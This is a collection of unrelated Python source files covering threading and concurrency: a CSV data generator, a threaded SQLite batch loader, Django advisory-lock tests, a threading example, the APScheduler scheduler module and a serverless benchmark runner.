csvwriter = csv.writer(datafile, delimiter=self.DELIMITER)
csvwriter.writerows(rows)
datafile.close()
if self.USE_SIZE:
write_more = True
while write_more:
writer(nrows_threshold)
fsize = os.path.getsize(fp)
if fsize >= max_perfile:
write_more = False
else:
while max_perfile:
if max_perfile > nrows_threshold:
writer(nrows_threshold)
max_perfile = max_perfile - nrows_threshold
else:
writer(max_perfile)
max_perfile = 0
def generate(self):
if self.USE_SIZE:
max_perfile = self.SIZE / self.NUM_FILES
else:
max_perfile = self.NUM_RECORDS / self.NUM_FILES
if self.THREADING_ENABLE:
stop = 1
while self.NUM_FILES:
start = stop
if self.NUM_THREADS >= self.NUM_FILES:
stop = stop + self.NUM_FILES
self.NUM_FILES = 0
else:
stop = stop + self.NUM_THREADS
self.NUM_FILES = self.NUM_FILES - self.NUM_THREADS
threads = []
print start, stop, self.NUM_FILES
for f in xrange(start, stop):
fp = os.path.join(self.TARGET_PATH, self.FILE_PREFIX + str(f) + self.FILE_SUFFIX)
threads.append(Thread(target=self.write2file, args=(fp, max_perfile,)))
[thread.start() for thread in threads]
[thread.join() for thread in threads]
else:
for f in xrange(1, self.NUM_FILES + 1):
fp = os.path.join(self.TARGET_PATH, self.FILE_PREFIX + str(f) + self.FILE_SUFFIX)
self.write2file(fp, max_perfile)
if __name__ == '__main__':
argparser = ArgumentParser()
argparser.add_argument("-d", "--delimiter",
dest="DELIMITER",
type=str,
default=",",
help="delimiter to separate the columns.")
argparser.add_argument("-s", "--size",
dest="SIZE",
help="total size of data to generate. Takes precedence over records parameter.")
argparser.add_argument("-r", "--records",
dest="NUM_RECORDS",
type=int,
default=1000,
help="total number of records to generate. Will not be used if size parameter is specified.")
argparser.add_argument("-c", "--columns",
dest="NUM_COLUMNS",
type=int,
default=10,
help="number of required columns")
argparser.add_argument("-f", "--files",
dest="NUM_FILES",
type=int,
help="number of files to generate")
argparser.add_argument("--target-dir",
dest="TARGET_PATH",
default=os.path.dirname(__file__),
help="path to store the generated files")
argparser.add_argument("--prefix",
dest="FILE_PREFIX",
default="datagen_file_",
help="filenames should start with")
argparser.add_argument("--suffix",
dest="FILE_SUFFIX",
default="",
help="filenames should end with")
argparser.add_argument("--compress",
action="store_true",
help="Gzip compress the generated files")
argparser.add_argument("--threaded",
action="store_true",
help="run multiple threads")
argparser.add_argument("-t", "--threads",
dest="NUM_THREADS",
type=int,
help="number of threads to use")
argparser.add_argument("--constraints",
dest="DATA_CONSTRAINTS",
type=dict,
help="dictionary of custom data format and length. Allowed keys are "
"DECIMAL_PRECISION, DECIMAL_SCALE, VARCHAR_MIN, VARCHAR_MAX, TEXT_MIN, TEXT_MAX,"
"DAYS_AGO, DATE_FORMAT, TIMESTAMP_FORMAT.")
argparser.parse_args()
datagen = DataGen(argparser.parse_args())
datagen.generate()
|
threaded_batched.py | """ batched, sqlite3 optimised and multi threaded version.
This version builds from sqlite3_opt_batched.py, but this one is multithreaded and probabaly the complex variant of all python ones.
We have a queue, spawn a single writer thread which consumes from queue and writes to SQLite. Then we spawn few more producer threads
which generate the data, push to queue.
previous: sqlite3_opt_batched.py
"""
import queue
import sqlite3
import threading
import multiprocessing
from typing import List
from commons import get_random_age, get_random_active, get_random_bool, get_random_area_code, create_table
DB_NAME = "threaded_batched.db"
q = queue.Queue()
def consumer():
con = sqlite3.connect(DB_NAME, isolation_level=None)
con.execute('PRAGMA journal_mode = OFF;')
con.execute('PRAGMA synchronous = 0;')
con.execute('PRAGMA cache_size = 1000000;') # give it a GB
con.execute('PRAGMA locking_mode = EXCLUSIVE;')
con.execute('PRAGMA temp_store = MEMORY;')
create_table(con)
while True:
item = q.get()
stmt, batch = item
con.execute('BEGIN')
con.executemany(stmt, batch)
con.commit()
q.task_done()
def producer(count: int):
min_batch_size = 1_000_000
for _ in range(int(count / min_batch_size)):
with_area = get_random_bool()
current_batch = []
for _ in range(min_batch_size):
age = get_random_age()
active = get_random_active()
# switch for area code
if with_area:
# random 6 digit number
area = get_random_area_code()
current_batch.append((area, age, active))
else:
current_batch.append((age, active))
if with_area:
q.put(('INSERT INTO user VALUES (NULL,?,?,?)', current_batch))
else:
q.put(('INSERT INTO user VALUES (NULL,NULL,?,?)', current_batch))
def main():
total_rows = 100_000_000
# start the consumer. Marks this thread as daemon thread. Our main / program exits only
# when the consumer thread has returned
# https://docs.python.org/3.8/library/threading.html#thread-objects
threading.Thread(target=consumer, daemon=True).start()
# we would want to launch as many as producers, so we will take the max CPU value
# and launch as many. We keep two threads, one for main and one for consumer.
max_producers = multiprocessing.cpu_count() - 2
# how many rows each producer should produce
each_producer_count = int(total_rows / max_producers)
producer_threads: List[threading.Thread] = [threading.Thread(
target=producer, args=(each_producer_count,)) for _ in range(max_producers)]
for p in producer_threads:
p.start()
for p in producer_threads:
p.join()
q.join()
if __name__ == '__main__':
main()
|
test_advisory_lock.py | from contextlib import contextmanager
from multiprocessing import get_all_start_methods
from multiprocessing import get_start_method
from multiprocessing import Pipe
from multiprocessing import Process
from multiprocessing import set_start_method
from time import sleep
from django.db import transaction
from django.test.testcases import SimpleTestCase
from django_concurrent_tests.management.commands.concurrent_call_wrapper import use_test_databases
from mock import mock
from mock import patch
from pytest import mark
from pytest import raises
from contentcuration.db.advisory_lock import advisory_lock
from contentcuration.db.advisory_lock import AdvisoryLockBusy
from contentcuration.db.advisory_lock import execute_lock
from contentcuration.db.advisory_lock import try_advisory_lock
TEST_LOCK = 1337
# flake8 doesn't like the parameterized formatting
# flake8: noqa
@mark.parametrize("key1, key2, unlock, session, shared, wait, expected_query", [
# transaction level
(1, None, False, False, False, True, "SELECT pg_advisory_xact_lock(%s) AS lock;"),
(3, None, False, False, True, True, "SELECT pg_advisory_xact_lock_shared(%s) AS lock;"),
(4, None, False, False, True, False, "SELECT pg_try_advisory_xact_lock_shared(%s) AS lock;"),
(5, None, False, False, False, False, "SELECT pg_try_advisory_xact_lock(%s) AS lock;"),
(6, 1, False, False, False, True, "SELECT pg_advisory_xact_lock(%s, %s) AS lock;"),
(7, 2, False, False, True, True, "SELECT pg_advisory_xact_lock_shared(%s, %s) AS lock;"),
(8, 3, False, False, True, False, "SELECT pg_try_advisory_xact_lock_shared(%s, %s) AS lock;"),
(9, 4, False, False, False, False, "SELECT pg_try_advisory_xact_lock(%s, %s) AS lock;"),
# session level
(10, None, False, True, False, True, "SELECT pg_advisory_lock(%s) AS lock;"),
(11, None, True, True, False, True, "SELECT pg_advisory_unlock(%s) AS lock;"),
(12, None, False, True, True, True, "SELECT pg_advisory_lock_shared(%s) AS lock;"),
(13, None, True, True, True, True, "SELECT pg_advisory_unlock_shared(%s) AS lock;"),
(14, None, False, True, False, False, "SELECT pg_try_advisory_lock(%s) AS lock;"),
(15, None, True, True, False, False, "SELECT pg_try_advisory_unlock(%s) AS lock;"),
(16, None, False, True, True, False, "SELECT pg_try_advisory_lock_shared(%s) AS lock;"),
(17, None, True, True, True, False, "SELECT pg_try_advisory_unlock_shared(%s) AS lock;"),
(18, 1, False, True, False, True, "SELECT pg_advisory_lock(%s, %s) AS lock;"),
(19, 2, True, True, False, True, "SELECT pg_advisory_unlock(%s, %s) AS lock;"),
(20, 3, False, True, True, True, "SELECT pg_advisory_lock_shared(%s, %s) AS lock;"),
(21, 4, True, True, True, True, "SELECT pg_advisory_unlock_shared(%s, %s) AS lock;"),
(22, 5, False, True, False, False, "SELECT pg_try_advisory_lock(%s, %s) AS lock;"),
(23, 6, True, True, False, False, "SELECT pg_try_advisory_unlock(%s, %s) AS lock;"),
(24, 7, False, True, True, False, "SELECT pg_try_advisory_lock_shared(%s, %s) AS lock;"),
(25, 8, True, True, True, False, "SELECT pg_try_advisory_unlock_shared(%s, %s) AS lock;"),
])
def test_execute_lock(key1, key2, unlock, session, shared, wait, expected_query):
with patch("contentcuration.db.advisory_lock.connection") as conn:
cursor = mock.Mock()
conn.cursor.return_value.__enter__.return_value = cursor
conn.in_atomic_block.return_value = not session
cursor.execute.return_value = True
with execute_lock(key1, key2=key2, unlock=unlock, session=session, shared=shared, wait=wait) as c:
assert c == cursor
expected_params = [key1]
if key2 is not None:
expected_params.append(key2)
query, params = cursor.execute.call_args_list[0][0]
assert query == expected_query
assert params == expected_params
@mark.parametrize("unlock, in_atomic_block", [
(False, False),
(True, False),
(True, True),
])
def test_execute_lock__not_implemented(unlock, in_atomic_block):
with patch("contentcuration.db.advisory_lock.connection") as conn:
conn.in_atomic_block = in_atomic_block
with raises(NotImplementedError):
with execute_lock(99, key2=99, unlock=unlock, session=False, shared=False, wait=False):
pass
START_SIGNAL = 'START_SIGNAL'
END_SIGNAL = 'END_SIGNAL'
SLEEP_SEC = 0.1
def wait_for(conn, signal):
while True:
msg = conn.recv()
if msg == signal:
break
sleep(SLEEP_SEC)
def child_lock(conn, shared):
# make sure we're connecting to the test database
use_test_databases()
with transaction.atomic():
advisory_lock(TEST_LOCK, shared=shared)
sleep(SLEEP_SEC)
conn.send(START_SIGNAL)
wait_for(conn, END_SIGNAL)
# set to spawn, otherwise process would inherit connections, meaning queries would still be in
# the same transaction. If we can't use spawn, then we'll mark the test skipped
skipped = True
start_method = get_start_method(allow_none=True)
if start_method == "spawn":
skipped = False
elif start_method is None and "spawn" in get_all_start_methods():
set_start_method("spawn")
skipped = False
@mark.skipif(skipped, reason="Requires spawn capability")
class AdvisoryLockDatabaseTest(SimpleTestCase):
"""
Test case that creates simultaneous locking situations
"""
# this test manages its own transactions
allow_database_queries = True
@contextmanager
def child_lock(self, shared=False):
parent_conn, child_conn = Pipe()
p = Process(target=child_lock, args=(child_conn, shared))
p.start()
try:
with transaction.atomic():
wait_for(parent_conn, START_SIGNAL)
yield parent_conn
finally:
parent_conn.send(END_SIGNAL)
p.join(2)
@mark.timeout(30)
def test_shared(self):
with self.child_lock(shared=True):
# this won't raise an error because shared mode should allow
# both locks simultaneously
try_advisory_lock(TEST_LOCK, shared=True)
@mark.timeout(30)
def test_try__busy(self):
with self.child_lock(shared=False):
# since the lock should already be acquired, this will raise the error
with raises(AdvisoryLockBusy):
try_advisory_lock(TEST_LOCK)
|
ex4_sample.py | import logging
import threading
import time
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
# x.join()
logging.info("Main : all done")
|
scheduler.py | """
This module is the main part of the library. It houses the Scheduler class
and related exceptions.
"""
from threading import Thread, Event, Lock
from datetime import datetime, timedelta
from logging import getLogger
import os
import sys
from apscheduler.util import *
from apscheduler.triggers import SimpleTrigger, IntervalTrigger, CronTrigger
from apscheduler.jobstores.ram_store import RAMJobStore
from apscheduler.job import Job, MaxInstancesReachedError
from apscheduler.events import *
from apscheduler.threadpool import ThreadPool
logger = getLogger(__name__)
class SchedulerAlreadyRunningError(Exception):
"""
Raised when attempting to start or configure the scheduler when it's
already running.
"""
def __str__(self):
return 'Scheduler is already running'
class Scheduler(object):
"""
This class is responsible for scheduling jobs and triggering
their execution.
"""
_stopped = True
_thread = None
def __init__(self, gconfig={}, **options):
self._wakeup = Event()
self._jobstores = {}
self._jobstores_lock = Lock()
self._listeners = []
self._listeners_lock = Lock()
self._pending_jobs = []
self.configure(gconfig, **options)
def configure(self, gconfig={}, **options):
"""
Reconfigures the scheduler with the given options. Can only be done
when the scheduler isn't running.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Set general options
config = combine_opts(gconfig, 'apscheduler.', options)
self.misfire_grace_time = int(config.pop('misfire_grace_time', 1))
self.coalesce = asbool(config.pop('coalesce', True))
self.daemonic = asbool(config.pop('daemonic', True))
self.standalone = asbool(config.pop('standalone', False))
# Configure the thread pool
if 'threadpool' in config:
self._threadpool = maybe_ref(config['threadpool'])
else:
threadpool_opts = combine_opts(config, 'threadpool.')
self._threadpool = ThreadPool(**threadpool_opts)
# Configure job stores
jobstore_opts = combine_opts(config, 'jobstore.')
jobstores = {}
for key, value in jobstore_opts.items():
store_name, option = key.split('.', 1)
opts_dict = jobstores.setdefault(store_name, {})
opts_dict[option] = value
for alias, opts in jobstores.items():
classname = opts.pop('class')
cls = maybe_ref(classname)
jobstore = cls(**opts)
self.add_jobstore(jobstore, alias, True)
def start(self):
"""
Starts the scheduler in a new thread.
In threaded mode (the default), this method will return immediately
after starting the scheduler thread.
In standalone mode, this method will block until there are no more
scheduled jobs.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Create a RAMJobStore as the default if there is no default job store
if not 'default' in self._jobstores:
self.add_jobstore(RAMJobStore(), 'default', True)
# Schedule all pending jobs
for job, jobstore in self._pending_jobs:
self._real_add_job(job, jobstore, False)
del self._pending_jobs[:]
self._stopped = False
if self.standalone:
self._main_loop()
else:
self._thread = Thread(target=self._main_loop, name='APScheduler')
self._thread.setDaemon(self.daemonic)
self._thread.start()
def shutdown(self, wait=True, shutdown_threadpool=True,
close_jobstores=True):
"""
Shuts down the scheduler and terminates the thread.
Does not interrupt any currently running jobs.
:param wait: ``True`` to wait until all currently executing jobs have
finished (if ``shutdown_threadpool`` is also ``True``)
:param shutdown_threadpool: ``True`` to shut down the thread pool
:param close_jobstores: ``True`` to close all job stores after shutdown
"""
if not self.running:
return
self._stopped = True
self._wakeup.set()
# Shut down the thread pool
if shutdown_threadpool:
self._threadpool.shutdown(wait)
# Wait until the scheduler thread terminates
if self._thread:
self._thread.join()
# Close all job stores
if close_jobstores:
for jobstore in itervalues(self._jobstores):
jobstore.close()
@property
def running(self):
thread_alive = self._thread and self._thread.isAlive()
standalone = getattr(self, 'standalone', False)
return not self._stopped and (standalone or thread_alive)
def add_jobstore(self, jobstore, alias, quiet=False):
"""
Adds a job store to this scheduler.
:param jobstore: job store to be added
:param alias: alias for the job store
:param quiet: True to suppress scheduler thread wakeup
:type jobstore: instance of
:class:`~apscheduler.jobstores.base.JobStore`
:type alias: str
"""
self._jobstores_lock.acquire()
try:
if alias in self._jobstores:
raise KeyError('Alias "%s" is already in use' % alias)
self._jobstores[alias] = jobstore
jobstore.load_jobs()
finally:
self._jobstores_lock.release()
# Notify listeners that a new job store has been added
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_ADDED, alias))
# Notify the scheduler so it can scan the new job store for jobs
if not quiet:
self._wakeup.set()
def remove_jobstore(self, alias, close=True):
"""
Removes the job store by the given alias from this scheduler.
:param close: ``True`` to close the job store after removing it
:type alias: str
"""
self._jobstores_lock.acquire()
try:
jobstore = self._jobstores.pop(alias)
if not jobstore:
raise KeyError('No such job store: %s' % alias)
finally:
self._jobstores_lock.release()
# Close the job store if requested
if close:
jobstore.close()
# Notify listeners that a job store has been removed
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_REMOVED, alias))
def add_listener(self, callback, mask=EVENT_ALL):
"""
Adds a listener for scheduler events. When a matching event occurs,
``callback`` is executed with the event object as its sole argument.
If the ``mask`` parameter is not provided, the callback will receive
events of all types.
:param callback: any callable that takes one argument
:param mask: bitmask that indicates which events should be listened to
"""
self._listeners_lock.acquire()
try:
self._listeners.append((callback, mask))
finally:
self._listeners_lock.release()
def remove_listener(self, callback):
"""
Removes a previously added event listener.
"""
self._listeners_lock.acquire()
try:
for i, (cb, _) in enumerate(self._listeners):
if callback == cb:
del self._listeners[i]
finally:
self._listeners_lock.release()
def _notify_listeners(self, event):
self._listeners_lock.acquire()
try:
listeners = tuple(self._listeners)
finally:
self._listeners_lock.release()
for cb, mask in listeners:
if event.code & mask:
try:
cb(event)
except:
logger.exception('Error notifying listener')
def _real_add_job(self, job, jobstore, wakeup):
job.compute_next_run_time(datetime.now())
if not job.next_run_time:
raise ValueError('Not adding job since it would never be run')
self._jobstores_lock.acquire()
try:
try:
store = self._jobstores[jobstore]
except KeyError:
raise KeyError('No such job store: %s' % jobstore)
store.add_job(job)
finally:
self._jobstores_lock.release()
# Notify listeners that a new job has been added
event = JobStoreEvent(EVENT_JOBSTORE_JOB_ADDED, jobstore, job)
self._notify_listeners(event)
logger.info('Added job "%s" to job store "%s"', job, jobstore)
# Notify the scheduler about the new job
if wakeup:
self._wakeup.set()
def add_job(self, trigger, func, args, kwargs, jobstore='default',
**options):
"""
Adds the given job to the job list and notifies the scheduler thread.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param trigger: trigger that determines when ``func`` is called
:param func: callable to run at the given time
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param jobstore: alias of the job store to store the job in
:rtype: :class:`~apscheduler.job.Job`
"""
job = Job(trigger, func, args or [], kwargs or {},
options.pop('misfire_grace_time', self.misfire_grace_time),
options.pop('coalesce', self.coalesce), **options)
if not self.running:
self._pending_jobs.append((job, jobstore))
logger.info('Adding job tentatively -- it will be properly '
'scheduled when the scheduler starts')
else:
self._real_add_job(job, jobstore, True)
return job
def _remove_job(self, job, alias, jobstore):
jobstore.remove_job(job)
# Notify listeners that a job has been removed
event = JobStoreEvent(EVENT_JOBSTORE_JOB_REMOVED, alias, job)
self._notify_listeners(event)
logger.info('Removed job "%s"', job)
def add_date_job(self, func, date, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on a specific date and time.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run at the given time
:param date: the date/time to run the job at
:param name: name of the job
:param jobstore: stored the job in the named (or given) job store
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:type date: :class:`datetime.date`
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = SimpleTrigger(date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_interval_job(self, func, weeks=0, days=0, hours=0, minutes=0,
seconds=0, start_date=None, args=None, kwargs=None,
**options):
"""
Schedules a job to be completed on specified intervals.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param weeks: number of weeks to wait
:param days: number of days to wait
:param hours: number of hours to wait
:param minutes: number of minutes to wait
:param seconds: number of seconds to wait
:param start_date: when to first execute the job and start the
counter (default is after the given interval)
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:rtype: :class:`~apscheduler.job.Job`
"""
interval = timedelta(weeks=weeks, days=days, hours=hours,
minutes=minutes, seconds=seconds)
trigger = IntervalTrigger(interval, start_date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_cron_job(self, func, year=None, month=None, day=None, week=None,
day_of_week=None, hour=None, minute=None, second=None,
start_date=None, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on times that match the given
expressions.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param year: year to run on
:param month: month to run on
:param day: day of month to run on
:param week: week of the year to run on
:param day_of_week: weekday to run on (0 = Monday)
:param hour: hour to run on
:param second: second to run on
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:return: the scheduled job
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = CronTrigger(year=year, month=month, day=day, week=week,
day_of_week=day_of_week, hour=hour,
minute=minute, second=second,
start_date=start_date)
return self.add_job(trigger, func, args, kwargs, **options)
def cron_schedule(self, **options):
"""
Decorator version of :meth:`add_cron_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_cron_job(func, **options)
return func
return inner
def interval_schedule(self, **options):
"""
Decorator version of :meth:`add_interval_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_interval_job(func, **options)
return func
return inner
def get_jobs(self):
"""
Returns a list of all scheduled jobs.
:return: list of :class:`~apscheduler.job.Job` objects
"""
self._jobstores_lock.acquire()
try:
jobs = []
for jobstore in itervalues(self._jobstores):
jobs.extend(jobstore.jobs)
return jobs
finally:
self._jobstores_lock.release()
def unschedule_job(self, job):
"""
Removes a job, preventing it from being run any more.
"""
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
if job in list(jobstore.jobs):
self._remove_job(job, alias, jobstore)
return
finally:
self._jobstores_lock.release()
raise KeyError('Job "%s" is not scheduled in any job store' % job)
def unschedule_func(self, func):
"""
Removes all jobs that would execute the given function.
"""
found = False
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in list(jobstore.jobs):
if job.func == func:
self._remove_job(job, alias, jobstore)
found = True
finally:
self._jobstores_lock.release()
if not found:
raise KeyError('The given function is not scheduled in this '
'scheduler')
def print_jobs(self, out=None):
"""
Prints out a textual listing of all jobs currently scheduled on this
scheduler.
:param out: a file-like object to print to (defaults to **sys.stdout**
if nothing is given)
"""
out = out or sys.stdout
job_strs = []
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
job_strs.append('Jobstore %s:' % alias)
if jobstore.jobs:
for job in jobstore.jobs:
job_strs.append(' %s' % job)
else:
job_strs.append(' No scheduled jobs')
finally:
self._jobstores_lock.release()
out.write(os.linesep.join(job_strs) + os.linesep)
def _run_job(self, job, run_times):
"""
Acts as a harness that runs the actual job code in a thread.
"""
for run_time in run_times:
# See if the job missed its run time window, and handle possible
# misfires accordingly
difference = datetime.now() - run_time
grace_time = timedelta(seconds=job.misfire_grace_time)
if difference > grace_time:
# Notify listeners about a missed run
event = JobEvent(EVENT_JOB_MISSED, job, run_time)
self._notify_listeners(event)
logger.warning('Run time of job "%s" was missed by %s',
job, difference)
else:
try:
job.add_instance()
except MaxInstancesReachedError:
event = JobEvent(EVENT_JOB_MISSED, job, run_time)
self._notify_listeners(event)
logger.warning('Execution of job "%s" skipped: '
'maximum number of running instances '
'reached (%d)', job, job.max_instances)
break
logger.info('Running job "%s" (scheduled at %s)', job,
run_time)
try:
retval = job.func(*job.args, **job.kwargs)
except:
# Notify listeners about the exception
exc, tb = sys.exc_info()[1:]
event = JobEvent(EVENT_JOB_ERROR, job, run_time,
exception=exc, traceback=tb)
self._notify_listeners(event)
logger.exception('Job "%s" raised an exception', job)
else:
# Notify listeners about successful execution
event = JobEvent(EVENT_JOB_EXECUTED, job, run_time,
retval=retval)
self._notify_listeners(event)
logger.info('Job "%s" executed successfully', job)
job.remove_instance()
# If coalescing is enabled, don't attempt any further runs
if job.coalesce:
break
def _process_jobs(self, now):
"""
Iterates through jobs in every jobstore, starts pending jobs
and figures out the next wakeup time.
"""
next_wakeup_time = None
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in tuple(jobstore.jobs):
run_times = job.get_run_times(now)
if run_times:
self._threadpool.submit(self._run_job, job, run_times)
# Increase the job's run count
if job.coalesce:
job.runs += 1
else:
job.runs += len(run_times)
# Update the job, but don't keep finished jobs around
if job.compute_next_run_time(
now + timedelta(microseconds=1)):
jobstore.update_job(job)
else:
self._remove_job(job, alias, jobstore)
if not next_wakeup_time:
next_wakeup_time = job.next_run_time
elif job.next_run_time:
next_wakeup_time = min(next_wakeup_time,
job.next_run_time)
return next_wakeup_time
finally:
self._jobstores_lock.release()
def _main_loop(self):
"""Executes jobs on schedule."""
logger.info('Scheduler started')
self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_START))
self._wakeup.clear()
while not self._stopped:
logger.debug('Looking for jobs to run')
now = datetime.now()
next_wakeup_time = self._process_jobs(now)
# Sleep until the next job is scheduled to be run,
# a new job is added or the scheduler is stopped
if next_wakeup_time is not None:
wait_seconds = time_difference(next_wakeup_time, now)
logger.debug('Next wakeup is due at %s (in %f seconds)',
next_wakeup_time, wait_seconds)
try:
self._wakeup.wait(wait_seconds)
except IOError: # Catch errno 514 on some Linux kernels
pass
self._wakeup.clear()
elif self.standalone:
logger.debug('No jobs left; shutting down scheduler')
self.shutdown()
break
else:
logger.debug('No jobs; waiting until a job is added')
try:
self._wakeup.wait()
except IOError: # Catch errno 514 on some Linux kernels
pass
self._wakeup.clear()
logger.info('Scheduler has been shut down')
self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_SHUTDOWN))
|
run.py |
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "hellopython"
actionName = "hello-python"
params = ""
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','','']
i = 0
count = 0
while count < 3:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
